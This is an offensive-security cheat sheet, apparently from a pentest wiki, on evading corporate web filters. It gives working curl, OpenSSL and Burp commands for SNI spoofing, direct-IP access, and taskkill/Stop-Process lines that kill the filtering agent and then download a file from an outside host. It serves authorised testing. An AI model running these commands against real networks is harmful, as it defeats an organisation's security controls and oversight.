Bypass Web Filtering

Table of Contents

• Bypass using the IP address
• Bypass using Server Name Indication (SNI)
• Bypass by killing the service
• Bypass using ECH
• Bypass using Redirectors
• Bypass using Domain Fronting
• Reference

Bypass using the IP address

Depending on the configuration and tool, use IP address instead of server name to bypass web filtering.

nslookup DOMAIN
Use the IP address instead, http://IP

Bypass using Server Name Indication (SNI)

Server Name Indication (SNI) is an extension to the Transport Layer Security (TLS) computer networking protocol by which a client indicates which hostname it is attempting to connect to at the start of the handshaking process. The extension allows a server to present one of multiple possible certificates on the same IP address and TCP port number and hence allows multiple secure (HTTPS) websites (or any other service over TLS) to be served by the same IP address without requiring all those sites to use the same certificate. It is the conceptual equivalent to HTTP/1.1 name-based virtual hosting, but for HTTPS.

Find an allowed SNI

Look in the web filtering tool client logs to find some allowed bypass. For example:

findstr bypass C:\ProgramData\<tool name>\Logs\<logname>.log

Using a web browser, access the SNI and look at the SSL certificate. If the certificate is NOT from the web filtering tool, you can use it.

Using curl

DOMAIN=proxy.golang.org # Blocked domain
IP=142.250.69.113       # nslookup $DOMAIN
ALLOWED_SNI=update.microsoft.com
URL=https://${ALLOWED_SNI}/github.com/ysmood/leakless/@v/v0.9.0.zip

curl -k --resolve ${ALLOWED_SNI}:443:${IP} $URL -H "Host: ${DOMAIN}" --output file.zip

curl -k --connect-to ${ALLOWED_SNI}:443:${IP}: -H "Host: ${DOMAIN}" $URL --output file.zip

SNI Bypass on Explicit Proxy with TLS Inspection. The client can perform a TLS handshake with the proxy containing the spoofed SNI. The proxy will then establish a connection to the provided IP address and use the spoofed SNI.

curl --proxy http://x.x.x.x:8080 -k --connect-to ${ALLOWED_SNI}:443:${IP} -H "Host: ${DOMAIN}" $URL

Using OpenSSL

DOMAIN=proxy.golang.org # Blocked domain
IP=142.250.69.113       # nslookup $DOMAIN
ALLOWED_SNI=update.microsoft.com
URL=https://${ALLOWED_SNI}/github.com/ysmood/leakless/@v/v0.9.0.zip

openssl s_client -connect ${IP}:443 -servername ${ALLOWED_SNI}

Using Burp Suite

• Start Burp Suite.
• Click on the Repeater tab.
• Manually enter the request below.
• Click on the request target settings.
  • Host: blocked-domain.com
  • Select Override SNI
  • SNI: update.microsoft.com
  • Port: 443
  • Select Use HTTPS
  • Click OK
• Click Send

GET /forbidden-resource HTTP/2
Host: blocked-domain.com

Firefox add-on

Use Firefox add-on “Escape” that manipulate the SNI (Server Name Indication).

• Click on Options.
  • HTTPS Website: *
  • Overwritten SNI value: update.microsoft.com
  • Allow Cert. exception: true
• Click on Save

Bypass by killing the service

taskkill

taskkill /IM "<service name>.exe" /F && curl -k -o C:\Users\Public\test.txt https://<some forbidden site>/test.txt

tasklist | sort

taskkill /PID 1234 /F && curl -k -o C:\Users\Public\test.txt https://tmpfiles.org/dl/1757045/test.txt

PowerShell

powershell
Stop-Process -Name "<service name>.exe" -Force

powershell -c "Get-Process -Name 2first-letters-of-servicename*"

powershell -c "Stop-Process -ID 1234 -Force" && curl -k -o C:\Users\Public\test.txt https://tmpfiles.org/dl/1757045/test.txt

Bypass using ECH

ECH, the standardized replacement for SNI, is now supported at CloudFlare dns service and in Firefox.

Using Firefox

• Click on Settings -> General
• In the search bar, enter Enable DNS over HTTPS
• Select Max Protection
• Select Cloudflare as the provider
• Enter about:config in the URL bar.
• Enter network.dns.echconfig and set it to true

This should fully encrypt your DNS lookups.

Bypass using Redirectors

See Redirectors.

Bypass using Domain Fronting

See Domain Fronting.

Reference

• Bypassing Web Filters Part 1: SNI Spoofing (Compass Security)